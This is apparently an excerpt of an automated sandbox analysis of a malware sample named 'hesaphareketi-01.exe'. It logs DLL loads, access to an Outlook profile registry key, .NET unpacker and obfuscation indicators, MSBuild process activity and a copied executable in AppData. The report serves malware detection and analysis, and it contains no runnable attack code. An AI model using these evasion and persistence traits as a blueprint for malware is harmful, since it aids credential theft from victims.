Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: hesaphareketi-01.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: hesaphareketi-01.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.cs	.Net Code: TDdfTfLscr System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.cs	.Net Code: TDdfTfLscr System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.5190000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.cs	.Net Code: TDdfTfLscr System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.39c8e88.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_00F4EFB0 push eax; iretd	0_2_00F4EFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B124B9 push 8BFFFFFFh; retf	9_2_02B124BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06752F02 pushad ; iretd	9_2_06752F01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06752EFA pushad ; iretd	9_2_06752F01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06757497 push es; iretd	9_2_06757498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06756A93 push es; iretd	9_2_06756A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06752890 push eax; retf	9_2_06752891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067569CF push es; retf	9_2_067569D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EA67 push es; ret	9_2_0678EA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EAFF push es; ret	9_2_0678EB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EB97 push es; ret	9_2_0678EB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EA0F push es; ret	9_2_0678EB88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EA0F push es; retf 78E7h	9_2_0678EDE4
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_02BCEFB0 push eax; iretd	10_2_02BCEFB1
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_05386647 pushfd ; ret	10_2_0538664D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537287A push eax; retf	16_2_05372891

Source: hesaphareketi-01.exe	Static PE information: section name: .text entropy: 7.469835605712907
Source: WvaGpcFVX.exe.0.dr	Static PE information: section name: .text entropy: 7.469835605712907

Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, qoCKLV6IGSiEkOdL4Z.cs	High entropy of concatenated method names: 'Dispose', 'FATmZHsYdI', 'zjMaMVbVHx', 'O3a99xZXc5', 'CJymiiBYZv', 'mttmzU7CT7', 'ProcessDialogKey', 'vAZanWwS89', 'QIEamRPAme', 'L3gaaWg2JD'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, Tnx7lX7pYZME0dkUiV.cs	High entropy of concatenated method names: 'eIUFNXew4r', 'AehFbEHwAW', 'FtIFlaWgKJ', 'n1lFMkQn6Q', 'XyVFs6ZuT4', 'aAwFRuhMoo', 'NFcFedLHqx', 'ljtF4RkaIv', 't91FqMRlJf', 'mvBFJ7ipMU'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, jjb5i283Hv1KSrhtSt.cs	High entropy of concatenated method names: 'SD2LwG0XqO', 'AgULBtnNdJ', 'HMPLTmC78x', 'VXqLX4QidC', 'NtNLU0I5fW', 'fILL5qbjNe', 'GX6L3aDTcp', 'S6HLNG5kKw', 'aMXLbxQ0cQ', 'tmrLdmhEWw'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, f7QpN0cQhZhrxgdGypl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f8J8GdPURZ', 'pGe8CMfR3H', 'yFp8ShLsLa', 'DnX8vsAWqI', 'WOC8Wx5vGO', 'gdE8QVjJWm', 'eRG8o1OxIO'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, igPOmdm7iZ8TpUX9eT.cs	High entropy of concatenated method names: 'VX81XP35bl', 'nIf15MYy9s', 'fxX1NL8pqx', 'B0s1bfdlpc', 'DuM1h8NsfG', 'lYP1kGWi3m', 'Ek912BtAoR', 'rBW1Aklghf', 'oxe1Pxvw1x', 'Xl718sxydi'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, vER2EhtOHL9TLC5ieA.cs	High entropy of concatenated method names: 'gyypGvHUOn', 'yInpChEGLd', 'YHRpSALSNo', 'GD8pvCiH9f', 'P0lpWUFv9S', 'jVOpQSl1LV', 'qvtpoixa58', 'nqtpgdsLUF', 'PuJpZjtZRb', 'OKppisuH7n'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.cs	High entropy of concatenated method names: 'cSAE0ybjtU', 'fZBEOyNy7a', 'ChIEpBu556', 'EAvE1eUgOX', 'wVREHsxbaf', 'mA1EKLiNnc', 'qDRELKfDB0', 'GupEr7WZ2W', 'RoCEIO4Ypl', 'k2tEcxqAHO'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, dRUD6tzwqSiuxr2ICW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zx7PFFtSdQ', 'SPhPh4XqGC', 'iJjPkNxBkx', 'JnuP2e3fjG', 'MtsPAL4aTM', 'kWOPPFLsqT', 'tPlP8WoRcb'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, d1wm1cc5rZAYAaXFoBu.cs	High entropy of concatenated method names: 'I0ePwxLIVa', 'yWGPBsiwcF', 'psEPTvJ2N7', 'gv6PX7yK8X', 'lv6PUKvjrW', 'hUhP5CBDnU', 'tHoP3SYsoP', 'mBbPN49xSZ', 'L48PbdL6iu', 'NMiPdUSroM'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, nxtOg2ySsFnBQpJMlv.cs	High entropy of concatenated method names: 'lKiLOHu6QN', 'iMGL12NDP6', 'Dj2LKTnvCK', 'liHKiUyDGh', 'm55KzBfogl', 'FrMLnPjatB', 'BTNLmeI2NN', 'fAVLa3erCE', 'wo9LEZiDbr', 'IZVLffI1fh'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, Kyn3VQEXKatZt8C2gJ.cs	High entropy of concatenated method names: 'ToString', 'BgskJRZXfS', 'Qg1kMMob5C', 'sFSkulpG3L', 'ewYksJc7rC', 'tb0kRHstqX', 'cI5k684jax', 'Bm3keZfQdX', 'eQ0k4LEql6', 'KXKkVK30Q8'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HA5KGVnDr1g9DDY2U3.cs	High entropy of concatenated method names: 'dXATNOPNm', 'eZFXATkAR', 'LDi57cO12', 'Chy386fc1', 'i5kb8Vw95', 'j0IdFn4Ae', 'hhMR7jluUZlA0VBbQ3', 'p1QEwUK4GoxO7fQisL', 'RS1AYk33V', 'smT8ga3vI'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, iEdKtAhoOZ61OEIwZf.cs	High entropy of concatenated method names: 'Pk8AliZojn', 'jbEAMxtRT5', 'F7FAuWbynl', 'u3MAsNyCnE', 'hXTAGaQsLQ', 'NBlARIOV7v', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, QqJtG6Fm8l5o2Jes3n.cs	High entropy of concatenated method names: 'RdA2cXxPBi', 'oNR274dYNl', 'ToString', 'Sa02O2DZis', 'tuP2poTc81', 'GuF21Ss8Ih', 'Ju92HwW4os', 'fcJ2Klkhhl', 'e272LoWvFF', 'gkw2rgKVWr'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, Mj7IHJPEgFkKQb2HIB.cs	High entropy of concatenated method names: 'uOXAOfRwYO', 'uLDApfRpLd', 'iSOA1r3WbM', 'jWPAH8s5jm', 'zsUAKGOWTw', 'RXUAL4bruP', 'Yf1Arjnegj', 'zOiAIl83Ia', 'yBOAcbHYm3', 'viHA72gUYW'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, dO4cCFGreIfcTfcEoq.cs	High entropy of concatenated method names: 'CT3K090LuZ', 'G9sKpJqPGd', 'vRkKH3HWmF', 'qHdKLRsXYR', 'yAtKreTfru', 'bsAHWhAW0V', 'qDgHQIPw5c', 'ztNHoMQmGH', 'kZGHgZqyVi', 'u3rHZLRqqm'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, FqGxhrDon3ZgwcSj4E.cs	High entropy of concatenated method names: 'nKVPmqgSj3', 'bK2PEDRS5Y', 'yADPf6llpn', 'VUDPOb4Vqv', 'RCGPpjXFXp', 'kmNPHPW3sW', 'Dm4PKQlUaf', 'GZtAoXIIHV', 'sR4Ag0IUEJ', 'Tu9AZ25sG1'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, WEcm2lgpsOIjQaW3Ww.cs	High entropy of concatenated method names: 'fXemLDXEIB', 'eDymru7CjA', 'JDbmcIxKsj', 'Xlim78tXvg', 'ra8mhSW4Gv', 'wcamkSKYes', 'IjC5hroY0wJLd4Dk0U', 'Jm6Ck8WaL4bhiFyDDw', 'qbYmmPHKji', 'l26mEXBaeo'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, IXiuyndR63KB667cvG.cs	High entropy of concatenated method names: 'MbUHUTuvaq', 'RNnH3xLSBW', 'o8w1ugfSly', 'zSn1s3DCUm', 'dOY1RH4M11', 'wNt16rfnrY', 'MYi1eRThbc', 'hKi14564hY', 'noH1VEarSS', 'axs1qmGMvm'
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, p7tuS7CtYtgO2dJ1Ly.cs	High entropy of concatenated method names: 'DFT2g7XXW1', 'cGu2iclsp3', 'XYsAngdTwq', 'FpCAmNF5km', 'gse2JxEg2N', 'gik2YLUjMY', 'qOs2jflFqv', 'tim2GWli8M', 'ecX2CBUKc5', 'NXp2S8X62m'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, qoCKLV6IGSiEkOdL4Z.cs	High entropy of concatenated method names: 'Dispose', 'FATmZHsYdI', 'zjMaMVbVHx', 'O3a99xZXc5', 'CJymiiBYZv', 'mttmzU7CT7', 'ProcessDialogKey', 'vAZanWwS89', 'QIEamRPAme', 'L3gaaWg2JD'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, Tnx7lX7pYZME0dkUiV.cs	High entropy of concatenated method names: 'eIUFNXew4r', 'AehFbEHwAW', 'FtIFlaWgKJ', 'n1lFMkQn6Q', 'XyVFs6ZuT4', 'aAwFRuhMoo', 'NFcFedLHqx', 'ljtF4RkaIv', 't91FqMRlJf', 'mvBFJ7ipMU'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, jjb5i283Hv1KSrhtSt.cs	High entropy of concatenated method names: 'SD2LwG0XqO', 'AgULBtnNdJ', 'HMPLTmC78x', 'VXqLX4QidC', 'NtNLU0I5fW', 'fILL5qbjNe', 'GX6L3aDTcp', 'S6HLNG5kKw', 'aMXLbxQ0cQ', 'tmrLdmhEWw'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, f7QpN0cQhZhrxgdGypl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f8J8GdPURZ', 'pGe8CMfR3H', 'yFp8ShLsLa', 'DnX8vsAWqI', 'WOC8Wx5vGO', 'gdE8QVjJWm', 'eRG8o1OxIO'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, igPOmdm7iZ8TpUX9eT.cs	High entropy of concatenated method names: 'VX81XP35bl', 'nIf15MYy9s', 'fxX1NL8pqx', 'B0s1bfdlpc', 'DuM1h8NsfG', 'lYP1kGWi3m', 'Ek912BtAoR', 'rBW1Aklghf', 'oxe1Pxvw1x', 'Xl718sxydi'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, vER2EhtOHL9TLC5ieA.cs	High entropy of concatenated method names: 'gyypGvHUOn', 'yInpChEGLd', 'YHRpSALSNo', 'GD8pvCiH9f', 'P0lpWUFv9S', 'jVOpQSl1LV', 'qvtpoixa58', 'nqtpgdsLUF', 'PuJpZjtZRb', 'OKppisuH7n'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.cs	High entropy of concatenated method names: 'cSAE0ybjtU', 'fZBEOyNy7a', 'ChIEpBu556', 'EAvE1eUgOX', 'wVREHsxbaf', 'mA1EKLiNnc', 'qDRELKfDB0', 'GupEr7WZ2W', 'RoCEIO4Ypl', 'k2tEcxqAHO'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, dRUD6tzwqSiuxr2ICW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zx7PFFtSdQ', 'SPhPh4XqGC', 'iJjPkNxBkx', 'JnuP2e3fjG', 'MtsPAL4aTM', 'kWOPPFLsqT', 'tPlP8WoRcb'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, d1wm1cc5rZAYAaXFoBu.cs	High entropy of concatenated method names: 'I0ePwxLIVa', 'yWGPBsiwcF', 'psEPTvJ2N7', 'gv6PX7yK8X', 'lv6PUKvjrW', 'hUhP5CBDnU', 'tHoP3SYsoP', 'mBbPN49xSZ', 'L48PbdL6iu', 'NMiPdUSroM'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, nxtOg2ySsFnBQpJMlv.cs	High entropy of concatenated method names: 'lKiLOHu6QN', 'iMGL12NDP6', 'Dj2LKTnvCK', 'liHKiUyDGh', 'm55KzBfogl', 'FrMLnPjatB', 'BTNLmeI2NN', 'fAVLa3erCE', 'wo9LEZiDbr', 'IZVLffI1fh'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, Kyn3VQEXKatZt8C2gJ.cs	High entropy of concatenated method names: 'ToString', 'BgskJRZXfS', 'Qg1kMMob5C', 'sFSkulpG3L', 'ewYksJc7rC', 'tb0kRHstqX', 'cI5k684jax', 'Bm3keZfQdX', 'eQ0k4LEql6', 'KXKkVK30Q8'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HA5KGVnDr1g9DDY2U3.cs	High entropy of concatenated method names: 'dXATNOPNm', 'eZFXATkAR', 'LDi57cO12', 'Chy386fc1', 'i5kb8Vw95', 'j0IdFn4Ae', 'hhMR7jluUZlA0VBbQ3', 'p1QEwUK4GoxO7fQisL', 'RS1AYk33V', 'smT8ga3vI'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, iEdKtAhoOZ61OEIwZf.cs	High entropy of concatenated method names: 'Pk8AliZojn', 'jbEAMxtRT5', 'F7FAuWbynl', 'u3MAsNyCnE', 'hXTAGaQsLQ', 'NBlARIOV7v', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, QqJtG6Fm8l5o2Jes3n.cs	High entropy of concatenated method names: 'RdA2cXxPBi', 'oNR274dYNl', 'ToString', 'Sa02O2DZis', 'tuP2poTc81', 'GuF21Ss8Ih', 'Ju92HwW4os', 'fcJ2Klkhhl', 'e272LoWvFF', 'gkw2rgKVWr'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, Mj7IHJPEgFkKQb2HIB.cs	High entropy of concatenated method names: 'uOXAOfRwYO', 'uLDApfRpLd', 'iSOA1r3WbM', 'jWPAH8s5jm', 'zsUAKGOWTw', 'RXUAL4bruP', 'Yf1Arjnegj', 'zOiAIl83Ia', 'yBOAcbHYm3', 'viHA72gUYW'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, dO4cCFGreIfcTfcEoq.cs	High entropy of concatenated method names: 'CT3K090LuZ', 'G9sKpJqPGd', 'vRkKH3HWmF', 'qHdKLRsXYR', 'yAtKreTfru', 'bsAHWhAW0V', 'qDgHQIPw5c', 'ztNHoMQmGH', 'kZGHgZqyVi', 'u3rHZLRqqm'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, FqGxhrDon3ZgwcSj4E.cs	High entropy of concatenated method names: 'nKVPmqgSj3', 'bK2PEDRS5Y', 'yADPf6llpn', 'VUDPOb4Vqv', 'RCGPpjXFXp', 'kmNPHPW3sW', 'Dm4PKQlUaf', 'GZtAoXIIHV', 'sR4Ag0IUEJ', 'Tu9AZ25sG1'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, WEcm2lgpsOIjQaW3Ww.cs	High entropy of concatenated method names: 'fXemLDXEIB', 'eDymru7CjA', 'JDbmcIxKsj', 'Xlim78tXvg', 'ra8mhSW4Gv', 'wcamkSKYes', 'IjC5hroY0wJLd4Dk0U', 'Jm6Ck8WaL4bhiFyDDw', 'qbYmmPHKji', 'l26mEXBaeo'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, IXiuyndR63KB667cvG.cs	High entropy of concatenated method names: 'MbUHUTuvaq', 'RNnH3xLSBW', 'o8w1ugfSly', 'zSn1s3DCUm', 'dOY1RH4M11', 'wNt16rfnrY', 'MYi1eRThbc', 'hKi14564hY', 'noH1VEarSS', 'axs1qmGMvm'
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, p7tuS7CtYtgO2dJ1Ly.cs	High entropy of concatenated method names: 'DFT2g7XXW1', 'cGu2iclsp3', 'XYsAngdTwq', 'FpCAmNF5km', 'gse2JxEg2N', 'gik2YLUjMY', 'qOs2jflFqv', 'tim2GWli8M', 'ecX2CBUKc5', 'NXp2S8X62m'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, qoCKLV6IGSiEkOdL4Z.cs	High entropy of concatenated method names: 'Dispose', 'FATmZHsYdI', 'zjMaMVbVHx', 'O3a99xZXc5', 'CJymiiBYZv', 'mttmzU7CT7', 'ProcessDialogKey', 'vAZanWwS89', 'QIEamRPAme', 'L3gaaWg2JD'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, Tnx7lX7pYZME0dkUiV.cs	High entropy of concatenated method names: 'eIUFNXew4r', 'AehFbEHwAW', 'FtIFlaWgKJ', 'n1lFMkQn6Q', 'XyVFs6ZuT4', 'aAwFRuhMoo', 'NFcFedLHqx', 'ljtF4RkaIv', 't91FqMRlJf', 'mvBFJ7ipMU'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, jjb5i283Hv1KSrhtSt.cs	High entropy of concatenated method names: 'SD2LwG0XqO', 'AgULBtnNdJ', 'HMPLTmC78x', 'VXqLX4QidC', 'NtNLU0I5fW', 'fILL5qbjNe', 'GX6L3aDTcp', 'S6HLNG5kKw', 'aMXLbxQ0cQ', 'tmrLdmhEWw'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, f7QpN0cQhZhrxgdGypl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f8J8GdPURZ', 'pGe8CMfR3H', 'yFp8ShLsLa', 'DnX8vsAWqI', 'WOC8Wx5vGO', 'gdE8QVjJWm', 'eRG8o1OxIO'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, igPOmdm7iZ8TpUX9eT.cs	High entropy of concatenated method names: 'VX81XP35bl', 'nIf15MYy9s', 'fxX1NL8pqx', 'B0s1bfdlpc', 'DuM1h8NsfG', 'lYP1kGWi3m', 'Ek912BtAoR', 'rBW1Aklghf', 'oxe1Pxvw1x', 'Xl718sxydi'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, vER2EhtOHL9TLC5ieA.cs	High entropy of concatenated method names: 'gyypGvHUOn', 'yInpChEGLd', 'YHRpSALSNo', 'GD8pvCiH9f', 'P0lpWUFv9S', 'jVOpQSl1LV', 'qvtpoixa58', 'nqtpgdsLUF', 'PuJpZjtZRb', 'OKppisuH7n'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.cs	High entropy of concatenated method names: 'cSAE0ybjtU', 'fZBEOyNy7a', 'ChIEpBu556', 'EAvE1eUgOX', 'wVREHsxbaf', 'mA1EKLiNnc', 'qDRELKfDB0', 'GupEr7WZ2W', 'RoCEIO4Ypl', 'k2tEcxqAHO'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, dRUD6tzwqSiuxr2ICW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zx7PFFtSdQ', 'SPhPh4XqGC', 'iJjPkNxBkx', 'JnuP2e3fjG', 'MtsPAL4aTM', 'kWOPPFLsqT', 'tPlP8WoRcb'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, d1wm1cc5rZAYAaXFoBu.cs	High entropy of concatenated method names: 'I0ePwxLIVa', 'yWGPBsiwcF', 'psEPTvJ2N7', 'gv6PX7yK8X', 'lv6PUKvjrW', 'hUhP5CBDnU', 'tHoP3SYsoP', 'mBbPN49xSZ', 'L48PbdL6iu', 'NMiPdUSroM'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, nxtOg2ySsFnBQpJMlv.cs	High entropy of concatenated method names: 'lKiLOHu6QN', 'iMGL12NDP6', 'Dj2LKTnvCK', 'liHKiUyDGh', 'm55KzBfogl', 'FrMLnPjatB', 'BTNLmeI2NN', 'fAVLa3erCE', 'wo9LEZiDbr', 'IZVLffI1fh'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, Kyn3VQEXKatZt8C2gJ.cs	High entropy of concatenated method names: 'ToString', 'BgskJRZXfS', 'Qg1kMMob5C', 'sFSkulpG3L', 'ewYksJc7rC', 'tb0kRHstqX', 'cI5k684jax', 'Bm3keZfQdX', 'eQ0k4LEql6', 'KXKkVK30Q8'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HA5KGVnDr1g9DDY2U3.cs	High entropy of concatenated method names: 'dXATNOPNm', 'eZFXATkAR', 'LDi57cO12', 'Chy386fc1', 'i5kb8Vw95', 'j0IdFn4Ae', 'hhMR7jluUZlA0VBbQ3', 'p1QEwUK4GoxO7fQisL', 'RS1AYk33V', 'smT8ga3vI'
